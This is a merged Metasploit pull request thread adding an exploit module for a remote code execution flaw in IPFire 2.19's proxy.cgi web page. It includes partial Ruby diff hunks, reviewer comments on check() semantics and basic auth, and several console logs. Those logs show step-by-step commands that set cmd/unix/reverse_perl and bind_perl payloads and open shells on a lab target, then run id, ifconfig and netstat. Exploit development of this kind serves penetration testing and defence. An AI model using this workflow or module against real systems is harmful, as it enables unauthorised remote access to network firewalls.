### PR TITLE
ipfire proxy exec

### PR DESCRIPTION
**Pull request by h00die**
Adds an exploit module to take advantage of the RCE vulnerability in IPFire's web interface. This is a ruby rewrite of the module from exploit-db.

iso is avail at http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/ipfire_proxy_exec`
- [x] `set password admin``` or whatever it was set to at install
- [x] `set rhost 10.10.10.10`
- [x] `set payload cmd/unix/reverse_perl`
- [x] `set lhost 10.10.10.1`
- [x] `exploit`
- [x] **Verify** the thing does what it should

```
[*] Started reverse TCP handler on 192.168.2.229:4444 
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
```

### CODE REVIEW

**Comment by h00die** [comment]
I will note that you can ONLY get a reverse shell, not a bind.  I looked around for a while, but didn't see how you can specify reverse only.  If anyone knows, i'll fix that up.

**Comment by bwatters-r7** [comment]
```
msf > use exploit/linux/http/ipfire_proxy_exec 
msf exploit(ipfire_proxy_exec) > set password secret
password => admin vmpassword
msf exploit(ipfire_proxy_exec) > set rhost 192.168.77.120
rhost => 192.168.77.120
msf exploit(ipfire_proxy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(ipfire_proxy_exec) > set lhost 192.168.77.101
lhost => 192.168.77.101
msf exploit(ipfire_proxy_exec) > exploit

[*] Started reverse TCP handler on 192.168.77.101:4444 
[*] Command shell session 1 opened (192.168.77.101:4444 -> 192.168.77.120:36091) at 2016-06-02 15:10:44 -0500
id

uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
pwd
/srv/web/ipfire/cgi-bin
ifconfig
green0    Link encap:Ethernet  HWaddr 00:0C:29:F5:D3:E5  
          inet addr:192.168.77.120  Bcast:192.168.77.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:649 errors:0 dropped:0 overruns:0 frame:0
          TX packets:457 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:156669 (152.9 Kb)  TX bytes:254514 (248.5 Kb)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:298 errors:0 dropped:0 overruns:0 frame:0
          TX packets:298 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
```

File: modules/exploits/linux/http/ipfire_proxy_exec.rb [hunk 1]
```diff
@@ -0,0 +1,117 @@
...
+        vulnerability in the proxy.cgi page.
+      },
+      'Author'      =>
+        [
+          'h00die <mike@stcyrsecurity.com>', # module
+          'Yann CAM'                         # discovery
+        ],
+      'References'      =>
+        [
+          [ 'URL', 'https://www.exploit-db.com/exploits/39765/' ],
```
Comment (wchen-r7) [inline modules/exploits/linux/http/ipfire_proxy_exec.rb]: The correct way to register an EDB reference is:

```ruby
[ 'EDB', '39765' ]
```

File: modules/exploits/linux/http/ipfire_proxy_exec.rb [hunk 2]
```diff
@@ -0,0 +1,117 @@
...
+        Opt::RPORT(444)
+      ], self.class)
+  end
+
+  def check()
+    begin
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
```
Comment (wchen-r7) [inline modules/exploits/linux/http/ipfire_proxy_exec.rb]: You shouldn't have to do this, the HttpClient should automatically do basic_auth if the server asks for it. You can simply remove this line.

File: modules/exploits/linux/http/ipfire_proxy_exec.rb [hunk 3]
```diff
@@ -0,0 +1,117 @@
...
+
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/proxy.cgi',
+        'method'    => 'POST',
+        'ctype'     => 'application/x-www-form-urlencoded',
+        'headers'   =>
+          {
+            'Referer'   => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/proxy.cgi"
+          },
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
```
Comment (wchen-r7) [inline modules/exploits/linux/http/ipfire_proxy_exec.rb]: Same as the previous feedback. The HttpClient should automatically do basic_auth for you.

File: modules/exploits/linux/http/ipfire_proxy_exec.rb [hunk 4]
```diff
@@ -0,0 +1,117 @@
...
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+      })
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+
+      if version && update && version == "2.19" && update.to_i < 101
+        Exploit::CheckCode::Vulnerable
```
Comment (wchen-r7) [inline modules/exploits/linux/http/ipfire_proxy_exec.rb]: Modules should only flag Exploit::CheckCode::Vulnerable when the vulnerable code is actually triggered. Versions checks should use Exploit::CheckCode::Appears. Please also see:

https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check%28%29-method

**Comment by bwatters-r7** [comment]
Bind works for me:
```
msf exploit(ipfire_proxy_exec) > show options

Module options (exploit/linux/http/ipfire_proxy_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  secret           no        Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     192.168.77.120   yes       The target address
   RPORT     444              yes       The target port
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/bind_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.77.120   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(ipfire_proxy_exec) > exploit

[*] Started bind handler
[*] Command shell session 3 opened (192.168.77.101:40935 -> 192.168.77.120:4444) at 2016-06-03 09:35:48 -0500
id

uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
netstat -ant | grep 4444
tcp        0      0 192.168.77.120:4444     192.168.77.101:40935    ESTABLISHED 
tcp        0      0 192.168.77.120:36091    192.168.77.101:4444     ESTABLISHED 
whoami
nobody
```

**Comment by bwatters-r7** [comment]
Also, random addition to this and unrelated to the code to help anyone testing later:  while debugging connection issues on the IPFire VM, I discovered that the http server's listening port does not appear on netcat, but it is there:
```
bwatters@ubuntu:~/rapid7/metasploit-framework$ nc -nvz 192.168.77.120 444
Connection to 192.168.77.120 444 port [tcp/*] succeeded!
```
ipfire

For a more info: http://forum.ipfire.org/viewtopic.php?t=12361

**Comment by bwatters-r7** [comment]
I just shot a PR your direction with the suggested changes by @wchen-r7 and some style suggestions by rubocop: https://github.com/h00die/metasploit-framework/pull/2

**Comment by h00die** [comment]
@wchen-r7 @bwatters-r7 Thanks for the help.  Should be all fixed up and good to go!

**Comment by bwatters-r7** [comment]
```
msf > use exploit/linux/http/ipfire_proxy_exec 
msf exploit(ipfire_proxy_exec) > set password secret
password => secret
msf exploit(ipfire_proxy_exec) > set rhost 192.168.77.120
rhost => 192.168.77.120
msf exploit(ipfire_proxy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(ipfire_proxy_exec) > set lhost 192.168.77.101
lhost => 192.168.77.101
msf exploit(ipfire_proxy_exec) > exploit

[*] Started reverse TCP handler on 192.168.77.101:4444 
[*] Command shell session 1 opened (192.168.77.101:4444 -> 192.168.77.120:56269) at 2016-06-07 10:19:07 -0500

id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
pwd
/srv/web/ipfire/cgi-bin

###################################
#### BIND IS NOT FAST, BUT WORKS
###################################
msf exploit(ipfire_proxy_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(ipfire_proxy_exec) > exploit

[*] Started bind handler
[*] Command shell session 2 opened (192.168.77.101:34397 -> 192.168.77.120:4444) at 2016-06-07 10:20:15 -0500
id

uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
```

**Comment by bwatters-r7** [comment]
@h00die, thanks for making it easy!  We appreciate it, and keep them coming!

**Pull request merged**